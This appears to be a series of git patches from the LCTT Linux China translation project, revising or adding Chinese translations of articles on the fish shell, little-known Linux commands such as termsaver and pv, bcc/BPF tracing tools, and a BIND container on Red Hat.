zypper install fish ``` cd /etc/yum.repos.d/ -``` - -``` wget https://download.opensuse.org/repositories/shells:fish:release:2/RHEL_7/shells:fish:release:2.repo -``` - -``` yum install fish ``` @@ -150,13 +97,7 @@ yum install fish ``` cd /etc/yum.repos.d/ -``` - -``` wget https://download.opensuse.org/repositories/shells:fish:release:2/RedHat_RHEL-6/shells:fish:release:2.repo -``` - -``` yum install fish ``` @@ -164,9 +105,6 @@ yum install fish ``` sudo apt-get update -``` - -``` sudo apt-get install fish ``` @@ -181,44 +119,43 @@ $ fish Welcome to fish, the friendly interactive shell ``` -你可以在 ~/.config/fish/config.fish 上找到默认的 fish 配置(类似于 .bashrc)。如果它不存在,就创建它吧。 +你可以在 `~/.config/fish/config.fish` 上找到默认的 fish 配置(类似于 `.bashrc`)。如果它不存在,就创建它吧。 #### 自动建议 -当我输入一个命令,它自动建议一个浅灰色的命令。所以,我需要输入一个 Linux 命令的前几个字母,然后按下 tab 键来完成这个命令。 +当我输入一个命令,它以浅灰色自动建议一个命令。所以,我需要输入一个 Linux 命令的前几个字母,然后按下 `tab` 键来完成这个命令。 [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-1.png)][2] -如果有更多的可能性,它将会列出它们。你可以使用上/下箭头键从列表中选择列出的命令。在选择你想运行的命令后,只需按下右箭头键,然后按下 ENTER 运行它。 +如果有更多的可能性,它将会列出它们。你可以使用上/下箭头键从列表中选择列出的命令。在选择你想运行的命令后,只需按下右箭头键,然后按下 `ENTER` 运行它。 [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-2.png)][3] -无需 CTRL+r 了!正如你已知道的,我们通过按 ctrl+r 来反向搜索 Bash shell 中的历史命令。但在 fish shell 中是没有必要的。由于它有自动建议功能,只需输入命令的前几个字母,然后从历史记录中选择已经执行的命令。Cool,是吗? +无需 `CTRL+r` 了!正如你已知道的,我们通过按 `CTRL+r` 来反向搜索 Bash shell 中的历史命令。但在 fish shell 中是没有必要的。由于它有自动建议功能,只需输入命令的前几个字母,然后从历史记录中选择已经执行的命令。很酷,是吧。 #### 智能搜索 -我们也可以使用智能搜索来查找一个特定的命令,文件或者目录。例如,我输入一个命令的子串,然后按向下箭头键进行智能搜索,再次输入一个字母来从列表中选择所需的命令。 +我们也可以使用智能搜索来查找一个特定的命令、文件或者目录。例如,我输入一个命令的一部分,然后按向下箭头键进行智能搜索,再次输入一个字母来从列表中选择所需的命令。 [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-6.png)][4] #### 语法高亮 - 当你输入一个命令时,你将注意到语法高亮。请看下面当我在 Bash shell 和 fish shell 中输入相同的命令时截图的区别。 -Bash: +Bash: [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-3.png)][5] -Fish: +Fish: [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-4.png)][6] -正如你所看到的,“sudo” 在 fish shell 中已经被高亮显示。此外,默认情况下它将以红色显示无效命令。 +正如你所看到的,`sudo` 在 fish shell 中已经被高亮显示。此外,默认情况下它将以红色显示无效命令。 -#### 基于 web 的配置 +#### 基于 web 的配置方式 -这是 fish shell 另一个很酷的功能。我们可以设置我们的颜色,更改 fish 提示,并从网页上查看所有功能,变量,历史记录,键绑定。 +这是 fish shell 另一个很酷的功能。我们可以设置我们的颜色、更改 fish 提示符,并从网页上查看所有功能、变量、历史记录、键绑定。 启动 web 配置接口,只需输入: @@ -228,9 +165,9 @@ fish_config [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-5.png)][7] -#### 手册页完成 +#### 手册页补完 -Bash 和 其它 shells 支持可编程完成,但只有 fish 会通过解析已安装的手册自动生成他们。 +Bash 和 其它 shells 支持可编程的补完,但只有 fish 可以通过解析已安装的手册来自动生成它们。 为此,请运行: @@ -245,9 +182,9 @@ Parsing man pages and writing completions to /home/sk/.local/share/fish/generate 3435 / 3435 : zramctl.8.gz ``` -#### 禁用问候 +#### 禁用问候语 -默认情况下,fish 在启动时问候你(Welcome to fish, the friendly interactive shell)。如果你不想要这个问候消息,可以禁用它。为此,编辑 fish 配置文件: +默认情况下,fish 在启动时问候你(“Welcome to fish, the friendly interactive shell”)。如果你不想要这个问候消息,可以禁用它。为此,编辑 fish 配置文件: ``` vi ~/.config/fish/config.fish @@ -260,7 +197,6 @@ set -g -x fish_greeting '' ``` 你也可以设置任意自定义的问候语,而不是禁用 fish 问候。 -Instead of disabling fish greeting, you can also set any custom greeting message. ``` set -g -x fish_greeting 'Welcome to OSTechNix' @@ -268,7 +204,7 @@ set -g -x fish_greeting 'Welcome to OSTechNix' #### 获得帮助 -这是另一个引人注目的令人印象深刻的功能。要在终端的默认 web 浏览器中打开 fish 文档页面,只需输入: +这是另一个吸引我的令人印象深刻的功能。要在终端的默认 web 浏览器中打开 fish 文档页面,只需输入: ``` help @@ -282,13 +218,13 @@ man fish #### 设置 fish 为默认 shell -非常喜欢它?太好了!设置它作为默认 shell 吧。为此,请使用命令 chsh: +非常喜欢它?太好了!设置它作为默认 shell 吧。为此,请使用命令 `chsh`: ``` chsh -s /usr/bin/fish ``` -在这里,/usr/bin/fish 是 fish shell 的路径。如果你不知道正确的路径,以下命令将会帮助你: +在这里,`/usr/bin/fish` 是 fish shell 的路径。如果你不知道正确的路径,以下命令将会帮助你: ``` which fish @@ -298,7 +234,7 @@ which fish 请记住,为 Bash 编写的许多 shell 脚本可能不完全兼容 fish。 -要切换会 Bash,只需运行: +要切换回 Bash,只需运行: ``` bash @@ -310,13 +246,13 @@ bash chsh -s /bin/bash ``` -对目前的各位,这就是全部了。在这个阶段,你可能会得到一个有关 fish shell 使用的基本概念。 如果你正在寻找一个Bash的替代品,fish 可能是一个不错的选择。 +各位,这就是全部了。在这个阶段,你可能会得到一个有关 fish shell 使用的基本概念。 如果你正在寻找一个Bash的替代品,fish 可能是一个不错的选择。 Cheers! 资源: -* [fish shell website][1] +* [fish shell 官网][1] -------------------------------------------------------------------------------- @@ -324,7 +260,7 @@ via: https://www.ostechnix.com/install-fish-friendly-interactive-shell-linux/ 作者:[SK][a] 译者:[kimii](https://github.com/kimii) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From acaffa1b32edf834fcea1fe72921d4123bcf8955 Mon Sep 17 00:00:00 2001 From: feng lv Date: Sun, 10 Dec 2017 13:08:51 +0800 Subject: [PATCH 0470/1627] translated --- .../20170413 More Unknown Linux Commands.md | 133 ------------------ .../20170413 More Unknown Linux Commands.md | 132 +++++++++++++++++ 2 files changed, 132 insertions(+), 133 deletions(-) delete mode 100644 sources/tech/20170413 More Unknown Linux Commands.md create mode 100644 translated/tech/20170413 More Unknown Linux Commands.md diff --git a/sources/tech/20170413 More Unknown Linux Commands.md b/sources/tech/20170413 More Unknown Linux Commands.md deleted file mode 100644 index d773d7b4c9..0000000000 --- a/sources/tech/20170413 More Unknown Linux Commands.md +++ /dev/null @@ -1,133 +0,0 @@ -translating by ucasFL - -More Unknown Linux Commands -============================================================ - - -![unknown Linux commands](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/outer-limits-of-linux.jpg?itok=5L5xfj2v "unknown Linux commands") ->Explore the outer limits of Linux with Carla Schroder in this roundup of little-known utilities.[Creative Commons Zero][2]Pixabay - -A roundup of the fun and little-known utilities `termsaver`, `pv`, and `calendar`. `termsaver` is an ASCII screensaver for the console, and `pv` measures data throughput and simulates typing. Debian's `calendar` comes with a batch of different calendars, and instructions for making your own. - -![Linux commands](https://www.linux.com/sites/lcom/files/styles/floated_images/public/linux-commands-fig-1.png?itok=HveXXLLK "Linux commands") - -Figure 1: Star Wars screensaver.[Used with permission][1] - -### Terminal Screensaver - -Why should graphical desktops have all the fun with fancy screensavers? Install `termsaver` to enjoy fancy ASCII screensavers like matrix, clock, starwars, and a couple of not-safe-for-work screens. More on the NSFW screens in a moment. - -`termsaver` is included in Debian/Ubuntu, and if you're using a boring distro that doesn't package fun things (like CentOS), you can download it from [termsaver.brunobraga.net][7] and follow the simple installation instructions. - -Run `termsaver -h` to see a list of screens: - -``` - randtxt displays word in random places on screen - starwars runs the asciimation Star Wars movie - urlfetcher displays url contents with typing animation - quotes4all displays recent quotes from quotes4all.net - rssfeed displays rss feed information - matrix displays a matrix movie alike screensaver - clock displays a digital clock on screen - rfc randomly displays RFC contents - jokes4all displays recent jokes from jokes4all.net (NSFW) - asciiartfarts displays ascii images from asciiartfarts.com (NSFW) - programmer displays source code in typing animation - sysmon displays a graphical system monitor -``` - -Then run your chosen screen with `termsaver [screen name]`, e.g. `termsaver matrix`, and stop it with Ctrl+c. Get information on individual screens by running `termsaver [screen name] -h`. Figure 1 is from the `starwars` screen, which runs our old favorite [Asciimation Wars][8]. - -The not-safe-for-work screens pull in online feeds. They're not my cup of tea, but the good news is `termsaver` is a gaggle of Python scripts, so they're easy to hack to connect to any RSS feed you desire. - -### pv - -The `pv` command is one of those funny little utilities that lends itself to creative uses. Its intended use is monitoring data copying progress, like when you run `rsync` or create a `tar`archive. When you run `pv` without options the defaults are: - -* -p progress. - -* -t timer, total elapsed time. - -* -e, ETA, time to completion. This is often inaccurate as `pv` cannot always know the size of the data you are moving. - -* -r, rate counter, or throughput. - -* -b, byte counter. - -This is what an `rsync` transfer looks like: - -``` -$ rsync -av /home/carla/ /media/carla/backup/ | pv -sending incremental file list -[...] -103GiB 0:02:48 [ 615MiB/s] [ <=> -``` - -Create a tar archive like this example: - -``` -$ tar -czf - /file/path| (pv > backup.tgz) - 885MiB 0:00:30 [28.6MiB/s] [ <=> -``` - -`pv` monitors processes. To see maximum activity monitor a Web browser process. It is amazing how much activity that generates: - -``` -$ pv -d 3095 - 58:/home/carla/.pki/nssdb/key4.db: 0 B 0:00:33 - [ 0 B/s] [<=> ] - 78:/home/carla/.config/chromium/Default/Visited Links: - 256KiB 0:00:33 [ 0 B/s] [<=> ] - ] - 85:/home/carla/.con...romium/Default/data_reduction_proxy_leveldb/LOG: - 298 B 0:00:33 [ 0 B/s] [<=> ] -``` - -Somewhere on the Internet I stumbled across a most entertaining way to use `pv` to echo back what I type: - -``` -$ echo "typing random stuff to pipe through pv" | pv -qL 8 -typing random stuff to pipe through pv -``` - -The normal `echo` command prints the whole line at once. Piping it through `pv` makes it appear as though it is being re-typed. I have no idea if this has any practical value, but I like it. The `-L`controls the speed of the playback, in bytes per second. - -`pv` is one of those funny little old commands that has acquired a giant batch of options over the years, including fancy formatting options, multiple output options, and transfer speed modifiers. `man pv` reveals all. - -### /usr/bin/calendar - -It's amazing what you can learn by browsing `/usr/bin` and other commands directories, and reading man pages. `/usr/bin/calendar` on Debian/Ubuntu is a modification of the BSD calendar, but it omits the moon and sun phases. It retains multiple calendars including `calendar.computer, calendar.discordian, calendar.music`, and `calendar.lotr`. On my system the man page lists different calendars than exist in `/usr/bin/calendar`. This example displays the Lord of the Rings calendar for the next 60 days: - -``` -$ calendar -f /usr/share/calendar/calendar.lotr -A 60 -Apr 17 An unexpected party -Apr 23 Crowning of King Ellesar -May 19 Arwen leaves Lorian to wed King Ellesar -Jun 11 Sauron attacks Osgilliath -``` - -The calendars are plain text files so you can easily create your own. The easy way is to copy the format of the existing calendar files. `man calendar` contains detailed instructions for creating your own calendar file. - -Once again we come to the end too quickly. Take some time to cruise your own filesystem to dig up interesting commands to play with. - - _Learn more about Linux through the free ["Introduction to Linux" ][5]course from The Linux Foundation and edX._ - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/4/more-unknown-linux-commands - -作者:[ CARLA SCHRODER][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/cschroder -[1]:https://www.linux.com/licenses/category/used-permission -[2]:https://www.linux.com/licenses/category/creative-commons-zero -[3]:https://www.linux.com/files/images/linux-commands-fig-1png -[4]:https://www.linux.com/files/images/outer-limits-linuxjpg -[5]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux -[6]:https://www.addtoany.com/share#url=https%3A%2F%2Fwww.linux.com%2Flearn%2Fintro-to-linux%2F2017%2F4%2Fmore-unknown-linux-commands&title=More%20Unknown%20Linux%20Commands -[7]:http://termsaver.brunobraga.net/ -[8]:http://www.asciimation.co.nz/ diff --git a/translated/tech/20170413 More Unknown Linux Commands.md b/translated/tech/20170413 More Unknown Linux Commands.md new file mode 100644 index 0000000000..95bad0d983 --- /dev/null +++ b/translated/tech/20170413 More Unknown Linux Commands.md @@ -0,0 +1,132 @@ +更多你所不知道的 Linux 命令 +============================================================ + + +![unknown Linux commands](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/outer-limits-of-linux.jpg?itok=5L5xfj2v "unknown Linux commands") +>在这篇文章中和 Carla Schroder 一起探索 Linux 中的一些鲜为人知的强大工具。[CC Zero][2]Pixabay + +本文是一篇关于一些有趣但鲜为人知的工具 `termsaver`、`pv` 和 `calendar` 的文章。`termsaver` 是一个终端 ASCII 锁屏,`pv` 能够测量数据吞吐量并模拟输入。Debian 的 `calendar` 拥有许多不同的日历表,并且你还可以制定你自己的日历表。 + +![Linux commands](https://www.linux.com/sites/lcom/files/styles/floated_images/public/linux-commands-fig-1.png?itok=HveXXLLK "Linux commands") + +*图片 1: 星球大战屏保。[使用许可][1]* + +### 终端屏保 + +难道只有图形桌面能够拥有有趣的屏保吗?现在,你可以通过安装 `termsaver` 来享受 ASCII 屏保,比如 matrix(LCTT 译注:电影《黑客帝国》中出现的黑客屏保)、时钟、星球大战以及一系列不太安全的屏保。有趣的屏保将会瞬间占据 NSFW 屏幕。 + +`termsaver` 可以从 Debian/Ubuntu 的包管理器中直接下载安装,如果你使用别的不包含该软件包的发行版比如 CentOS,那么你可以从 [termsaver.brunobraga.net][7] 下载,然后按照安装指导进行安装。 + +运行 `termsaver -h` 来查看一系列屏保: + +``` + randtxt displays word in random places on screen + starwars runs the asciimation Star Wars movie + urlfetcher displays url contents with typing animation + quotes4all displays recent quotes from quotes4all.net + rssfeed displays rss feed information + matrix displays a matrix movie alike screensaver + clock displays a digital clock on screen + rfc randomly displays RFC contents + jokes4all displays recent jokes from jokes4all.net (NSFW) + asciiartfarts displays ascii images from asciiartfarts.com (NSFW) + programmer displays source code in typing animation + sysmon displays a graphical system monitor +``` + +你可以通过运行命令 `termsaver [屏保名]` 来使用屏保,比如 `termsaver matrix` ,然后按 `Ctrl+c` 停止。你也可以通过运行 `termsaver [屏保名] -h` 命令来获取关于某一个特定屏保的信息。图片 1 来自 `startwars` 屏保,它运行的是古老但受人喜爱的 [Asciimation Wars][8] 。 + +那些不太安全的屏保通过在线获取资源的方式运行,我并不喜欢它们,但好消息是,由于 `termsaver` 是一些 Python 的脚本文件,因此,你可以很容易的利用它们连接到任何你想要的 RSS 资源。 + +### pv + +`pv` 命令是一个非常有趣的小工具但却很实用。它的用途是监测数据复制的进程,比如,当你运行 `rsync` 命令或创建一个 `tar` 归档的时候。当你不带任何选项运行 `pv` 命令时,默认参数为: + +* -p :进程 + +* -t :时间,到当前总运行时间 + +* -e :预计完成时间,这往往是不准确的,因为 `pv` 通常不知道需要移动的数据的大小 + +* -r :速率计数器,或吞吐量 + +* -b :字节计数器 + +一次 `rsync` 传输看起来像这样: + +``` +$ rsync -av /home/carla/ /media/carla/backup/ | pv +sending incremental file list +[...] +103GiB 0:02:48 [ 615MiB/s] [ <=> +``` + +创建一个 tar 归档,就像下面这个例子: + +``` +$ tar -czf - /file/path| (pv > backup.tgz) + 885MiB 0:00:30 [28.6MiB/s] [ <=> +``` + +`pv` 能够监测进程,因此也可以监测 Web 浏览器的最大活动,令人惊讶的是,它产生了如此多的活动: + +``` +$ pv -d 3095 + 58:/home/carla/.pki/nssdb/key4.db: 0 B 0:00:33 + [ 0 B/s] [<=> ] + 78:/home/carla/.config/chromium/Default/Visited Links: + 256KiB 0:00:33 [ 0 B/s] [<=> ] + ] + 85:/home/carla/.con...romium/Default/data_reduction_proxy_leveldb/LOG: + 298 B 0:00:33 [ 0 B/s] [<=> ] +``` + +在网上,我偶然发现一个使用 `pv` 最有趣的方式:使用 `pv` 来回显输入的内容: + +``` +$ echo "typing random stuff to pipe through pv" | pv -qL 8 +typing random stuff to pipe through pv +``` + +普通的 `echo` 命令会瞬间打印一整行内容。通过管道传给 `pv` 之后能够让内容像是重新输入一样的显示出来。我不知道这是否有实际的价值,但是我非常喜欢它。`-L` 选项控制回显的速度,即多少字节每秒。 + +`pv` 是一个非常古老且非常有趣的命令,这么多年以来,它拥有了许多的选项,包括有趣的格式化选项,多输出选项,以及传输速度修改器。你可以通过 `man pv` 来查看所有的选项。 + +### /usr/bin/calendar + +通过浏览 `/usr/bin` 目录以及其他命令目录和阅读 man 手册,你能够学到很多东西。在 Debian/Ubuntu 上的 `/usr/bin/calendar` 是 BSD 日历的一个变种,但它忽略了月亮历和太阳历。它保留了多个日历包括 `calendar.computer, calendar.discordian, calendar.music` 以及 `calendar.lotr`。在我的系统上,man 手册列出了 `/usr/bin/calendar` 里存在的不同日历。下面这个例子展示了指环王日历接下来的 60 天: + +``` +$ calendar -f /usr/share/calendar/calendar.lotr -A 60 +Apr 17 An unexpected party +Apr 23 Crowning of King Ellesar +May 19 Arwen leaves Lorian to wed King Ellesar +Jun 11 Sauron attacks Osgilliath +``` + +这些日历是纯文本文件,因此,你可以轻松的创建你自己的日历。最简单的方式就是复制已经存在的日历文件的格式。你可以通过 `man calendar` 命令来查看创建个人日历文件的更详细的指导。 + +又一次很快走到了尽头。你可以花费一些时间来浏览你的文件系统,挖掘更多有趣的命令。 + + _你可以他通过来自 Linux 基金会和 edx 的免费课程 ["Introduction to Linux"][5] 来学习更过关于 Linux 的知识_。 + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/4/more-unknown-linux-commands + +作者:[ CARLA SCHRODER][a] +译者:[ucasFL](https://github.com/ucasFL) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/cschroder +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/creative-commons-zero +[3]:https://www.linux.com/files/images/linux-commands-fig-1png + +[4]:https://www.linux.com/files/images/outer-limits-linuxjpg +[5]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[6]:https://www.addtoany.com/share#url=https%3A%2F%2Fwww.linux.com%2Flearn%2Fintro-to-linux%2F2017%2F4%2Fmore-unknown-linux-commands&amp;amp;title=More%20Unknown%20Linux%20Commands +[7]:http://termsaver.brunobraga.net/ +[8]:http://www.asciimation.co.nz/ From 13685d79a4ce5410c72efaee9e8bae9d30d96d71 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Sun, 10 Dec 2017 16:08:01 +0800 Subject: [PATCH 0471/1627] Update 20171207 7 tools for analyzing performance in Linux with bccBPF.md --- ...lyzing performance in Linux with bccBPF.md | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md b/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md index eebfa9e30d..d0733e0903 100644 --- a/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md +++ b/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md @@ -18,27 +18,28 @@ opensource.com 在 linux 中出现的一种新技术能够为系统管理员和开发者提供大量用于性能分析和故障排除的新工具和仪表盘。 它被称为增强的伯克利数据包过滤器(eBPF,或BPF),虽然这些改进并不由伯克利开发,它们不仅仅是处理数据包,更多的是过滤。我将讨论在 Fedora 和 Red Hat Linux 发行版中使用 BPF 的一种方法,并在 Fedora 26 上演示。 -BPF can run user-defined sandboxed programs in the kernel to add new custom capabilities instantly. It's like adding superpowers to Linux, on demand. Examples of what you can use it for include: +BPF 可以运行自定义沙盒程序在内核中即刻添加新的自定义功能。这就像可按需给 Linux 系统添加超能力一般。 你可以使用它的例子包括如下: -* Advanced performance tracing tools: programmatic low-overhead instrumentation of filesystem operations, TCP events, user-level events, etc. +* 高级性能跟踪工具:文件系统操作、TCP事件、用户级事件等的编程低开销指令。 -* Network performance: dropping packets early on to improve DDOS resilience, or redirecting packets in-kernel to improve performance +* 网络性能 : 尽早丢弃数据包以提高DDoS的恢复能力,或者在内核中重定向数据包以提高性能。 -* Security monitoring: 24x7 custom monitoring and logging of suspicious kernel and userspace events +* 安全监控 : 24x7 小时全天候自定义检测和记录内核空间与用户空间内的可疑事件。 -BPF programs must pass an in-kernel verifier to ensure they are safe to run, making it a safer option, where possible, than writing custom kernel modules. I suspect most people won't write BPF programs themselves, but will use other people's. I've published many on GitHub as open source in the [BPF Compiler Collection (bcc)][12] project. bcc provides different frontends for BPF development, including Python and Lua, and is currently the most active project for BPF tooling. +在可能的情况下,BPF 程序必须通过一个内核验证机制来保证它们的安全运行,这比写自定义的内核模块更安全。我在此假设大多数人并不编写自己的 BPF 程序,而是使用别人写好的。在 GitHub 上的 [BPF Compiler Collection (bcc)][12] 项目中,我已发布许多。开源代码。bcc 提供不同的 BPF 开发前端支持,包括Python和Lua,并且是目前最活跃的 BPF 模具项目。 -### 7 useful new bcc/BPF tools +### 7 个有用的 bcc/BPF 新工具 +为了了解BCC / BPF工具和他们的乐器,我创建了下面的图表并添加到项目中 To understand the bcc/BPF tools and what they instrument, I created the following diagram and added it to the bcc project: -### [bcc_tracing_tools.png][13] +### [bcc_跟踪工具.png][13] -![Linux bcc/BPF tracing tools diagram](https://opensource.com/sites/default/files/u128651/bcc_tracing_tools.png) +![Linux bcc/BPF 跟踪工具图](https://opensource.com/sites/default/files/u128651/bcc_tracing_tools.png) Brendan Gregg, [CC BY-SA 4.0][14] -These are command-line interface (CLI) tools you can use over SSH (secure shell). Much analysis nowadays, including at my employer, is conducted using GUIs and dashboards. SSH is a last resort. But these CLI tools are still a good way to preview BPF capabilities, even if you ultimately intend to use them only through a GUI when available. I've began adding BPF capabilities to an open source GUI, but that's a topic for another article. Right now I'd like to share the CLI tools, which you can use today. +这些是命令行界面工具,你可以通过 SSH (安全外壳)使用它们。目前大多数分析,包括我的老板,是用 GUIs 和仪表盘进行的。SSH是最后的手段。但这些命令行工具仍然是预览BPF能力的好方法,即使你最终打算通过一个可用的 GUI 使用它。我已着手向一个开源 GUI 添加BPF功能,但那是另一篇文章的主题。现在我想分享你今天可以使用的 CLI 工具。 ### 1\. execsnoop From 83199cc7a00dfe6ea23d464c2f1b2767baa55de3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=B9=E8=8D=A3=E5=8D=87?= Date: Sun, 10 Dec 2017 19:34:59 +0800 Subject: [PATCH 0472/1627] Update 20161216 GitHub Is Building a Coder Paradise.md --- sources/tech/20161216 GitHub Is Building a Coder Paradise.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20161216 GitHub Is Building a Coder Paradise.md b/sources/tech/20161216 GitHub Is Building a Coder Paradise.md index 36e9e76343..d8a7b9e467 100644 --- a/sources/tech/20161216 GitHub Is Building a Coder Paradise.md +++ b/sources/tech/20161216 GitHub Is Building a Coder Paradise.md @@ -1,3 +1,4 @@ +translating by zrszrszrs GitHub Is Building a Coder’s Paradise. It’s Not Coming Cheap ============================================================ From 8056b28b8b767af79a2d3b12726fe46b40639761 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=B9=E8=8D=A3=E5=8D=87?= Date: Sun, 10 Dec 2017 19:38:20 +0800 Subject: [PATCH 0473/1627] Update 20171201 12 MySQL MariaDB Security Best Practices for Linux.md --- ...0171201 12 MySQL MariaDB Security Best Practices for Linux.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171201 12 MySQL MariaDB Security Best Practices for Linux.md b/sources/tech/20171201 12 MySQL MariaDB Security Best Practices for Linux.md index 5cf9169661..5653e2daed 100644 --- a/sources/tech/20171201 12 MySQL MariaDB Security Best Practices for Linux.md +++ b/sources/tech/20171201 12 MySQL MariaDB Security Best Practices for Linux.md @@ -1,3 +1,4 @@ +translating by zrszrszrs 12 MySQL/MariaDB Security Best Practices for Linux ============================================================ From 66abaff1fca41d94fe0c4cad993a1dc475120592 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=B9=E8=8D=A3=E5=8D=87?= Date: Sun, 10 Dec 2017 19:39:08 +0800 Subject: [PATCH 0474/1627] translating by zrszrszrs --- ...171201 12 MySQL MariaDB Security Best Practices for Linux.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171201 12 MySQL MariaDB Security Best Practices for Linux.md b/sources/tech/20171201 12 MySQL MariaDB Security Best Practices for Linux.md index 5653e2daed..8897f74f39 100644 --- a/sources/tech/20171201 12 MySQL MariaDB Security Best Practices for Linux.md +++ b/sources/tech/20171201 12 MySQL MariaDB Security Best Practices for Linux.md @@ -1,4 +1,4 @@ -translating by zrszrszrs +translating by zrszrszr 12 MySQL/MariaDB Security Best Practices for Linux ============================================================ From 5a8ca802d4eacdf388f92f099ba03f04f9bb1956 Mon Sep 17 00:00:00 2001 From: liuyakun Date: Sun, 10 Dec 2017 23:08:50 +0800 Subject: [PATCH 0475/1627] =?UTF-8?q?=E5=88=A0=E9=99=A4=E5=8E=9F=E6=96=87?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...es in Red Hat Enterprise Linux – Part 1.md | 232 ------------------ 1 file changed, 232 deletions(-) delete mode 100644 sources/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md diff --git a/sources/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md b/sources/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md deleted file mode 100644 index 2193b8078c..0000000000 --- a/sources/tech/20170719 Containing System Services in Red Hat Enterprise Linux – Part 1.md +++ /dev/null @@ -1,232 +0,0 @@ -translating by liuxinyu123 - -Containing System Services in Red Hat Enterprise Linux – Part 1 -============================================================ - - -At the 2017 Red Hat Summit, several people asked me “We normally use full VMs to separate network services like DNS and DHCP, can we use containers instead?”. The answer is yes, and here’s an example of how to create a system container in Red Hat Enterprise Linux 7 today.    - -### **THE GOAL** - -#### _Create a network service that can be updated independently of any other services of the system, yet easily managed and updated from the host._ - -Let’s explore setting up a BIND server running under systemd in a container. In this part, we’ll look at building our container, as well as managing the BIND configuration and data files. - -In Part Two, we’ll look at how systemd on the host integrates with systemd in the container. We’ll explore managing the service in the container, and enabling it as a service on the host. - -### **CREATING THE BIND CONTAINER** - -To get systemd working inside a container easily, we first need to add two packages on the host: `oci-register-machine` and `oci-systemd-hook`. The `oci-systemd-hook` hook allows us to run systemd in a container without needing to use a privileged container or manually configuring tmpfs and cgroups. The `oci-register-machine` hook allows us to keep track of the container with the systemd tools like `systemctl` and `machinectl`. - -``` -[root@rhel7-host ~]# yum install oci-register-machine oci-systemd-hook -``` - -On to creating our BIND container. The [Red Hat Enterprise Linux 7 base image][6]  includes systemd as an init system. We can install and enable BIND the same way we would on a typical system. You can [download this Dockerfile from the git repository][7] in the Resources. - -``` -[root@rhel7-host bind]# vi Dockerfile - -# Dockerfile for BIND -FROM registry.access.redhat.com/rhel7/rhel -ENV container docker -RUN yum -y install bind && \ -    yum clean all && \ -    systemctl enable named -STOPSIGNAL SIGRTMIN+3 -EXPOSE 53 -EXPOSE 53/udp -CMD [ "/sbin/init" ] -``` - -Since we’re starting with an init system as PID 1, we need to change the signal sent by the docker CLI when we tell the container to stop. From the `kill` system call man pages (`man 2 kill`): - -``` -The only signals that can be sent to process ID 1, the init -process, are those for which init has explicitly installed -signal handlers. This is done to assure the system is not -brought down accidentally. -``` - -For the systemd signal handlers, `SIGRTMIN+3` is the signal that corresponds to `systemd start halt.target`. We also expose both TCP and UDP ports for BIND, since both protocols could be in use. - -### **MANAGING DATA** - -With a functional BIND service, we need a way to manage the configuration and zone files. Currently those are inside the container, so we  _could_  enter the container any time we wanted to update the configs or make a zone file change. This isn’t ideal from a management perspective.  We’ll need to rebuild the container when we need to update BIND, so changes in the images would be lost. Having to enter the container any time we need to update a file or restart the service adds steps and time. - -Instead, we’ll extract the configuration and data files from the container and copy them to the host, then mount them at run time. This way we can easily restart or rebuild the container without losing changes. We can also modify configs and zones by using an editor outside of the container. Since this container data looks like “ _site-specific data served by this system_ ”, let’s follow the File System Hierarchy and create `/srv/named` on the local host to maintain administrative separation. - -``` -[root@rhel7-host ~]# mkdir -p /srv/named/etc - -[root@rhel7-host ~]# mkdir -p /srv/named/var/named -``` - -##### _NOTE: If you are migrating an existing configuration, you can skip the following step and copy it directly to the`/srv/named` directories. You may still want to check the container assigned GID with a temporary container._ - -Let’s build and run an temporary container to examine BIND. With a init process as PID 1, we can’t run the container interactively to get a shell. We’ll exec into it after it launches, and check for important files with `rpm`. - -``` -[root@rhel7-host ~]# docker build -t named . - -[root@rhel7-host ~]# docker exec -it $( docker run -d named ) /bin/bash - -[root@0e77ce00405e /]# rpm -ql bind -``` - -For this example, we’ll need `/etc/named.conf` and everything under `/var/named/`. We can extract these with `machinectl`. If there’s more than one container registered, we can see what’s running in any machine with `machinectl status`. Once we have the configs we can stop the temporary container. - - _There’s also a[ sample `named.conf` and zone files for `example.com` in the Resources][2] if you prefer._ - -``` -[root@rhel7-host bind]# machinectl list - -MACHINE                          CLASS     